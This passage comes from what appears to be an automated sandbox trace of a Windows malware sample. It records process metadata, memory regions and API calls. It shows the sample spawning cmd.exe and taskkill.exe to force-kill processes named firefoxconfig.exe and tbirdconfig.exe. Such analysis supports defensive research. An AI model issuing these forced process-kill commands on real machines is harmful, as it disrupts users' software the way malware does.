lpMode=0xf3f40c) returned 0 [0181.638] _get_osfhandle (_FileHandle=0) returned 0x130 [0181.638] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0181.638] GetConsoleOutputCP () returned 0x1b5 [0181.639] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0181.639] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.641] exit (_Code=128) Thread: id = 236 os_tid = 0xb98 Process: id = "41" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x30317000" os_pid = "0xf38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xb74" cmd_line = "taskkill /f /im firefoxconfig.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3154 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3155 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3156 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3157 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 3158 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3159 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 3160 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 3161 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 3162 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 3163 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3164 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 3165 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3166 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3167 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3168 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3169 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3170 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3171 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3172 start_va = 0x4150000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004150000" filename = "" Region: id = 3173 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3174 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3175 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3176 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3177 start_va = 0x4400000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3178 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3179 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3180 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3181 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3182 start_va = 0x4400000 end_va = 0x44bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3183 start_va = 0x44e0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 3184 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3185 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3186 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3187 start_va = 0x4160000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 3188 start_va = 0x41a0000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041a0000" filename = "" Region: id = 3189 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3190 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3191 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3192 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3193 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3194 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3195 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3196 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3197 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3198 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3199 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3200 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3201 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3202 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3203 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3204 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3205 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3206 start_va = 0x45e0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 3207 start_va = 0x45e0000 end_va = 0x4767fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045e0000" filename = "" Region: id = 3208 start_va = 0x4770000 end_va = 0x4799fff monitored = 0 entry_point = 0x4775680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3209 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 3210 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3211 start_va = 0x47d0000 end_va = 0x4950fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047d0000" filename = "" Region: id = 3212 start_va = 0x4960000 end_va = 0x5d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004960000" filename = "" Region: id = 3213 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3214 start_va = 0x4130000 end_va = 0x4130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004130000" filename = "" Region: id = 3215 start_va = 0x4140000 end_va = 0x4144fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 3216 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 3217 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 3218 start_va = 0x5d60000 end_va = 0x6096fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3219 start_va = 0x60a0000 end_va = 0x6189fff monitored = 0 entry_point = 0x60dd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3220 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 3221 start_va = 0x60a0000 end_va = 0x617ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3222 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3223 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 3224 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3225 start_va = 0x4770000 end_va = 0x4770fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 3226 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3227 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3228 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3229 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3230 start_va = 0x4780000 end_va = 0x47bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 3231 start_va = 0x6180000 end_va = 0x61bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 3232 start_va = 0x61c0000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061c0000" filename = "" Region: id = 3233 start_va = 0x6200000 end_va = 0x623ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 3234 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 3235 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 3236 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3237 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 3238 start_va = 0x62c0000 end_va = 0x62c5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000062c0000" filename = "" Thread: id = 237 os_tid = 0x7fc Thread: id = 238 os_tid = 0xdd4 Thread: id = 239 os_tid = 0xe5c Thread: id = 240 os_tid = 0x1364 Thread: id = 241 os_tid = 0x678 Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x419c2000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im tbirdconfig.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3241 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3242 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3243 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3244 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3245 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3246 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3247 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3248 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3249 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3250 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3251 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 3252 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3253 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3254 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3255 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3256 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 3257 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3258 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 3259 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3260 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3261 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3262 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3263 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3264 start_va = 0x460000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3265 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3266 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3267 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3268 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3269 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3270 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3271 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3272 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3273 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3274 start_va = 0x7c0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 3275 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3276 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3277 start_va = 0x8b0000 end_va = 0xbe6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 242 os_tid = 0xef4 [0182.089] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0182.089] __set_app_type (_Type=0x1) [0182.089] __p__fmode () returned 0x74974d6c [0182.089] __p__commode () returned 0x74975b1c [0182.092] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0182.093] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0182.093] GetCurrentThreadId () returned 0xef4 [0182.093] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xef4) returned 0x78 [0182.094] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0182.094] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0182.094] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.103] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.103] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0182.104] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.104] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.104] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.104] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.104] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: 